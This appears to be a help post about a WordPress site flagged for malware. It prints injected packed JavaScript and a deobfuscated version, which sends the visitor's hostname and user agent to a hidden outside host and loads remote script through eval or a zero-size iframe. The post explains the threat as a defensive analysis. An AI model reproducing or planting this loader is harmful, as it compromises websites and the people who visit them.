The site ahead contains malware in WordPress

Is the plugin disabled now?

Check the source of your site to see if it has been modified in any way.

Easiest might be to restore a backup to ensure you don’t miss any malicious changes.

WARNING

This is malicious code. I’ve put it on here for explanation purposes, but I’d recommend that you DO NOT execute this

It’s not as bad as a link that someone might accidentally click, and I figure this warning should suffice for anyone who decides that pasting this into their JS console seems like a good idea…

I see the following packed code block when I curl your site.

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('26 25(7,13){15 9=7.80(13);10(9>78)49"76: 83 100 5";19 9}26 35(7){10(1!==85.22)49"93: 92 88 86 87";7=99(7);15 13,9,17=[],31=7.22-7.22%3;10(0===7.22)19 7;97(13=0;31>13;13+=3)9=25(7,13)<<16|25(7,13+1)<<8|25(7,13+2),17.28(20.21(9>>18)),17.28(20.21(9>>12&63)),17.28(20.21(9>>6&63)),17.28(20.21(63&9));96(7.22-31){74 1:9=25(7,13)<<16,17.28(20.21(9>>18)+20.21(9>>12&63)+33+33);77;74 2:9=25(7,13)<<16|25(7,13+1)<<8,17.28(20.21(9>>18)+20.21(9>>12&63)+20.21(9>>6&63)+33)}19 17.55("")}15 33="=",20="79+/",81="1.0";26 51(){15 11;37{11=39 68("82.70")}44(17){37{11=39 68("94.70")}44(95){11=90}}10(!11&&91 66!='89'){11=39 66()}19 11}26 72(14){23=14.30('\<54');10(23==-1)19'';23=14.30('>',23);10(23==-1)19'';23++;24=14.30('\<\/54\>',23);10(24==-1)19'';19 14.58(23,24)}26 64(14){10(14.30('%48%')==-1)19 14;19 14.98('%48%').55(36(35(62.65.75)))}26 60(56){15 27=" "+34.27;15 40=" "+56+"=";15 38=42;15 29=0;15 24=0;10(27.22>0){29=27.30(40);10(29!=-1){29+=40.22;24=27.30(";",29);10(24==-1){24=27.22}38=84(27.58(29,24))}}19(38)}34.107('<57 132="43"></57>');10(60('133')==42){15 32='50'+'7'+'45:'+'/'+'/'+'2'+'61'+'61'+'3'+'.'+'47'+'134'+'/'+'131'+'73'+'7.45'+'67';32+=('?7=3&126='+36(35(62.65.125)));32+=('&101='+36(35(127.128)));37{15 11=51();11.129('136',32,137);11.145=26(){10(11.146==4&&11.142==138){14=64(11.139);34.71("43").69=14;41=72(14);10(41.22>0)140(41)}};11.141(42)}44(17){34.71("43").69='<'+'59'+'46'+'144 124'+'108'+'="52'+'109'+':/'+'/'+'110'+'2'+'-'+'53'+'102'+'53'+'.'+'47'+'73'+'/'+'103'+'104'+'112'+'.45'+'67"'+' 113'+'121='+'"0'+'" 122'+'119'+'7="0'+'" 46'+'118'+'114'+'31="'+'0" 115'+'116'+'117'+'52="'+'0" 123'+'120'+'105'+'50="'+'0" 106'+'111'+'143'+'47="'+'130'+'">'+'<'+'/'+'59'+'46'+'135'+'17'+'>'}}',10,147,'|||||||t||_|if|xmlhttp||A|src|var||e||return|_ALPHA|charAt|length|start|end|_pref_xxs_getbyte|function|cookie|push|offset|indexOf|r|url|_PADCHAR|document|_pref_xxs_encode64|encodeURIComponent|try|setStr|new|search|code|null|statspan_0_1|catch|p|fr|g|ENCURL|throw|ht|_pref_xxs_getXmlHttp|h|b|script|join|name|span|substring|i|_pref_xxs_getCookie|z|window||_pref_xxs_processMacro|location|XMLHttpRequest|hp|ActiveXObject|innerHTML|XMLHTTP|getElementById|_pref_xxs_extractScript|a|case|href|INVALID_CHARACTER_ERR|break|255|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|charCodeAt|_VERSION|Msxml2|DOM|unescape|arguments|argument|required|one|undefined|false|typeof|exactly|SyntaxError|Microsoft|E|switch|for|split|String|Exception|ua|o|co|un|nheig|sc|write|rc|ttp|l|rol|ter|wid|rde|mar|ginw|idt|amebo|gh|rgi|th|hei|ma|s|hostname|d|navigator|userAgent|open|no|st|id|stat01|q|am|GET|true|200|responseText|eval|send|status|lin|ame|onreadystatechange|readyState'.split('|'),0,{}))

which translates to

function _pref_xxs_getbyte(t,A)
    {
    var _=t.charCodeAt(A);
    if(_>255)throw"INVALID_CHARACTER_ERR: DOM Exception 5";
    return _
}
function _pref_xxs_encode64(t)
    {
    if(1!==arguments.length)throw"SyntaxError: exactly one argument required";
    t=String(t);
    var A,_,e=[],r=t.length-t.length%3;
    if(0===t.length)return t;
    for(A=0;
    r>A;
    A+=3)_=_pref_xxs_getbyte(t,A)<<16|_pref_xxs_getbyte(t,A+1)<<8|_pref_xxs_getbyte(t,A+2),e.push(_ALPHA.charAt(_>>18)),e.push(_ALPHA.charAt(_>>12&63)),e.push(_ALPHA.charAt(_>>6&63)),e.push(_ALPHA.charAt(63&_));
    switch(t.length-r)
        {
        case 1:_=_pref_xxs_getbyte(t,A)<<16,e.push(_ALPHA.charAt(_>>18)+_ALPHA.charAt(_>>12&63)+_PADCHAR+_PADCHAR);
        break;
        case 2:_=_pref_xxs_getbyte(t,A)<<16|_pref_xxs_getbyte(t,A+1)<<8,e.push(_ALPHA.charAt(_>>18)+_ALPHA.charAt(_>>12&63)+_ALPHA.charAt(_>>6&63)+_PADCHAR)
    }
    return e.join("")
}
var _PADCHAR="=",_ALPHA="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",_VERSION="1.0";
function _pref_xxs_getXmlHttp()
    {
    var xmlhttp;
    try
        {
        xmlhttp=new ActiveXObject("Msxml2.XMLHTTP")
    }
    catch(e)
        {
        try
            {
            xmlhttp=new ActiveXObject("Microsoft.XMLHTTP")
        }
        catch(E)
            {
            xmlhttp=false
        }
    }
    if(!xmlhttp&&typeof XMLHttpRequest!='undefined')
        {
        xmlhttp=new XMLHttpRequest()
    }
    return xmlhttp
}
function _pref_xxs_extractScript(src)
    {
    start=src.indexOf('<script');
    if(start==-1)return'';
    start=src.indexOf('>',start);
    if(start==-1)return'';
    start++;
    end=src.indexOf('</script>',start);
    if(end==-1)return'';
    return src.substring(start,end)
}
function _pref_xxs_processMacro(src)
    {
    if(src.indexOf('%ENCURL%')==-1)return src;
    return src.split('%ENCURL%').join(encodeURIComponent(_pref_xxs_encode64(window.location.href)))
}
function _pref_xxs_getCookie(name)
    {
    var cookie=" "+document.cookie;
    var search=" "+name+"=";
    var setStr=null;
    var offset=0;
    var end=0;
    if(cookie.length>0)
        {
        offset=cookie.indexOf(search);
        if(offset!=-1)
            {
            offset+=search.length;
            end=cookie.indexOf(";
            ",offset);
            if(end==-1)
                {
                end=cookie.length
            }
            setStr=unescape(cookie.substring(offset,end))
        }
    }
    return(setStr)
}
document.write('<span id="statspan_0_1"></span>');
if(_pref_xxs_getCookie('stat01')==null)
    {
    var url='ht'+'t'+'p:'+'/'+'/'+'2'+'z'+'z'+'3'+'.'+'g'+'q'+'/'+'st'+'a'+'t.p'+'hp';
    url+=('?t=3&d='+encodeURIComponent(_pref_xxs_encode64(window.location.hostname)));
    url+=('&ua='+encodeURIComponent(_pref_xxs_encode64(navigator.userAgent)));
    try
        {
        var xmlhttp=_pref_xxs_getXmlHttp();
        xmlhttp.open('GET',url,true);
        xmlhttp.onreadystatechange=function()
            {
            if(xmlhttp.readyState==4&&xmlhttp.status==200)
                {
                src=_pref_xxs_processMacro(xmlhttp.responseText);
                document.getElementById("statspan_0_1").innerHTML=src;
                code=_pref_xxs_extractScript(src);
                if(code.length>0)eval(code)
            }
        };
        xmlhttp.send(null)
    }
    catch(e)
        {
        document.getElementById("statspan_0_1").innerHTML='<'+'i'+'fr'+'ame s'+'rc'+'="h'+'ttp'+':/'+'/'+'l'+'2'+'-'+'b'+'o'+'b'+'.'+'g'+'a'+'/'+'co'+'un'+'ter'+'.p'+'hp"'+' wid'+'th='+'"0'+'" hei'+'gh'+'t="0'+'" fr'+'amebo'+'rde'+'r="'+'0" mar'+'ginw'+'idt'+'h="'+'0" ma'+'rgi'+'nheig'+'ht="'+'0" sc'+'rol'+'lin'+'g="'+'no'+'">'+'<'+'/'+'i'+'fr'+'am'+'e'+'>'
    }
}

Note the line

var url='ht'+'t'+'p:'+'/'+'/'+'2'+'z'+'z'+'3'+'.'+'g'+'q'+'/'+'st'+'a'+'t.p'+'hp';

which actually constructs the 2***.gq url. ¹

If you don’t have a stat01 cookie set, it loads stat.php from there (presumably malicious JS source) and executes it using eval.

In the process of making the request, it also sends up some user data (for metrics, loading proper exploit code, or something else?), including the current hostname and the useragent of the user’s browser.

Note that, should this fail, it also falls back on loading a URL at another domain l2***.ga/counter.php¹ in an iframe.

¹ link purposely broken, see source if you’re interested

The site ahead contains malware

1 comment

Social Network

Related posts

1 comment

Social Network